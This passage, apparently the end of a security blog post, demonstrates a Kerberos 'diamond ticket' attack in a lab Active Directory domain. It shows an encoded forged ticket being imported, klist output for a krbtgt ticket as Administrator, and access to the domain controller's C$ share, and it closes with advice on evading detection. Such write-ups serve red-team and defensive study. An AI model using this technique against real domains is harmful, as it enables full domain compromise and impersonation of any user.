      mAwGTvZtMYjkWWj3z5ll4zr5yXUFmYnokjVSL+eKDTIaxILnL/IuUw6/f8tX3SMcFV8JvdcemicXZ9bZ
      ayeXGaZJoMPyl0Js2wFWlhl01TXNyYPSE1hmfLNZ5hJ4aHjkZRsgxTVdsDNmWcIKatRdcB3NM3qe3CVJ
      LqZVyJmX03/KgJArnBysjvpmKDSzxAlUHs/1ah8r8GZqfB1f3NC30M6zVGPuHuYcwcdif7z9DlJnN5H1
      JTVp/bONmpKr7/4Q/kGMUstFADyv06WYtfnIkFSt6qT69bGHYxAlBve0Gg+gCRLIDv9kRmbOPuy7RkDP
      0tb24H+Dtbzt766M21dLAKuK5XzVHFvz5+JJrJxZ40SvtgZH+QO1ufchkH1Qhmk8J8GgOskSTwS7Spjj
      C2D4YIJdCmXUrSHWKHkrUUAWKJ/5uFvmvESTvkotB3JwZeKVc2Fzzc6dEGVuyJbVkopNT9l12gfB0922
      M0DW1MT1lVn+Y2ZuYqxRg5OFKJVJbzWKyOGWNReX9MeTZ6Pfl5jmX5DKzKQbCCTDz6AQHuI8M+kMHU7q
      nCvOUgoTxYvvXcqsZu9rs2jCZzBZmGMTAbmMeXGBNXtwxytEi2VBvo6Pe3HPNlcfDAK1zfqtrygypYif
      5z8FYZ7jaTojPmaR5bD1+wpdn1PuhdjZ+h3ppHHYPgrH/snQPvO5U6jW5dkIjw/MneR0J6pgLPqCZ7/L
      xC4Jr2tq55EIkZxesqwPgYM63ogVcjsV/80Ey+dcU4zF9t3bVluuRz0v7vCDdR1CSwHUJGAeovW03GjI
      hw+Q3TCoYFJBhCrnKCmWaxe5HzzX5JsSIketkziUFrV0c8X0bDDKfpwQW7rZ6J3CvUnFbDrENr453zsz
      t42wEjjcjeiMvOzwfnHhmkKOeEE36eBJgZHHMK/hEVH7WeSMSK5wYvbXCVt9Q0gXRqo3zYAy5ccbyjht
      TBjuKQ/xsO+qAZAm0EPoGRkyzSapfr/NGblZC9slQi5XW4iHnHMBFOPAxT8HTah2TcfCtv6BVohIG81m
      V7tUrGfn2I4AR/dz3weEhsOuRO8ywBf952eZ1WmQ69+M+yqjB0IDCIaikLehSxfTKFKjgfcwgfSgAwIB
      AKKB7ASB6X2B5jCB46CB4DCB3TCB2qArMCmgAwIBEqEiBCCKbjp9Am+uC2DueQoTup4VO2XeocleiNQr
      E7iyCfLxj6ESGxBCT1JERVJHQVRFLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUA
      YKEAAKURGA8yMDI0MDQzMDE1MTY0NVqmERgPMjAyNDA1MDEwMDAwMzhapxEYDzIwMjQwNTA3MTQwMDM4
      WqgSGxBCT1JERVJHQVRFLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBCT1JERVJHQVRFLkxPQ0FM
 
 
[+] Ticket successfully imported!
 
C:\Tools>klist
 
Current LogonId is 0:0x192612
 
Cached Tickets: (1)
 
#0>     Client: Administrator @ BORDERGATE.LOCAL
        Server: krbtgt/BORDERGATE.LOCAL @ BORDERGATE.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 4/30/2024 18:16:45 (local)
        End Time:   5/1/2024 1:00:38 (local)
        Renew Time: 5/7/2024 18:00:38 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:
 
C:\Tools>dir \\dc01\C$
 Volume in drive \\dc01\C$ has no label.
 Volume Serial Number is 343D-F2D0
 
 Directory of \\dc01\C$
 
08/05/2021  09:20    <DIR>          PerfLogs
28/04/2024  10:27    <DIR>          Program Files
08/05/2021  10:40    <DIR>          Program Files (x86)
28/04/2024  10:21    <DIR>          Users
28/04/2024  10:35    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,740,531,200 bytes free

In Conclusion

Diamond tickets give an attacker the ability to assume the identity of any user in a domain, whilst being more difficult to detect over traditional golden ticket attacks.In addition, it’s always worth ensuring the tickets being generated blend in with the target environment.

Related Posts

Infrastructure

802.1X

2025
bordergate
Infrastructure

Exploiting IOS-XE

2025
bordergate
Infrastructure

Dynamic DNS

2025
bordergate
Infrastructure

Alternative C2 Agents

2025
bordergate